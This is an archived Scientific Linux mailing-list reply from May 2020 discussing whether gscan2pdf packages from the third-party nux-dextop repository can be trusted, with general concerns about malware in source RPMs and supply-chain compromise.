LISTSERV - SCIENTIFIC-LINUX-USERS Archives

SCIENTIFIC-LINUX-USERS Archives

May 2020

SCIENTIFIC-LINUX-USERS@LISTSERV.FNAL.GOV

	LISTSERV Archives
	SCIENTIFIC-LINUX-USERS Home
	SCIENTIFIC-LINUX-USERS May 2020

	Log In
	Register

	Subscribe or Unsubscribe

	Search Archives

Options:	Use Monospaced Font Show Text Part by Default Show All Mail Headers
Message:	[<< First] [< Prev] [Next >] [Last >>]
Topic:	[<< First] [< Prev] [Next >] [Last >>]
Author:	[<< First] [< Prev] [Next >] [Last >>]

Subject:	Re: gscan2pdf
From:	Yasha Karant <[log in to unmask]>
Reply To:	Yasha Karant <[log in to unmask]>
Date:	Mon, 18 May 2020 16:15:04 -0700
Content-Type:	text/plain
Parts/Attachments:	text/plain (51 lines)

On 5/18/20 4:54 AM, Nico Kadel-Garcia wrote:
> On Mon, May 18, 2020 at 2:13 AM Akemi Yagi <[log in to unmask]> wrote:
>> On Sun, May 17, 2020 at 8:18 PM Yasha Karant <[log in to unmask]> wrote:
>>> I have found gscan2pdf on the NUX repo, but installing this repo
>>> evidently will add and replace many utilities, etc., that may not be
>>> wise.  gscan2pdf runs fine on Ubuntu 18 LTS as I just put in on my
>>> wife's 2-in-1 that does not have tablet write-on support under SL 7 as
>>> far as I can determine.  Is there any SL 7.8 compatible gscan2pdf that
>>> works?
>>>
>>> Take care.  Stay safe.
>>>
>>> Yasha Karant
>> I've been using gscan2pdf from the nux-dextop repository without any
>> issue. Also, this repository, together with EPEL, should not overwrite
>> any base package.
>>
>> Akemi
> I'm personally reluctant to trust third party RPM repositories from
> Romania, they have a very active and abusive cracker community.but the
> SRPM from
> https://urldefense.proofpoint.com/v2/url?u=https-3A__li.nux.ro_download_nux_dextop_el7_SRPMS_gscan2pdf-2D1.2.5-2D2.el7.nux.src.rpm&d=DwIBaQ&c=B_W-eXUX249zycySS1AyzjABMeYirU1wvo9-GmMObjY&r=Z7xHp2tIJsvAE2FtPxl_lynvf4hA_FJ8mKsaIgvY6Dk&m=knBIe0JxmSUI-af995EwuorG9qw79W1SDujA9o1-DW4&s=KAdL127uDliK692ZlpFMVwEGC9HREwkQ80agoYvObHc&e=
> looks clean and builds well.
Niko.

If you are building from a src RPM, unless you read the source code or 
have a very good automaton code scanner (as done by some of the 
clandestine and other security agencies), how do you know that there is 
no "malware" embedded in the source? For example, a "clean" source may 
require the use of a compromised library or (in the cases of fork and 
exec) executable, unless no related RPMs (or DEB, etc.) come from the 
repo that may be questionable.  Akemi indicates no problem from 
experience, but does Akemi have safeguards and "sniffers" running  that 
would detect an inappropriate packet being transmitted (that might 
contain root password or other "sensitive" information)?

If you have built the RPM and are reasonably confident that it is 
"clean", could you kindly post or supply the exact build script that you 
used, including any other RPMs that are required but that come from 
trusted repos?

I generally trust SL (and EPEL, ElRepo, Oracle, Canonical, Mozilla, 
Libreoffice, etc.), but I get worried about repos and sources from 
nation-states or entities with large scale compromise organizations 
(e.g., professional "organized criminial" enterprises or clandestine 
services "backdoors").

Take care.  Stay safe.

Yasha Karant

ATOM RSS1 RSS2

LISTSERV.FNAL.GOV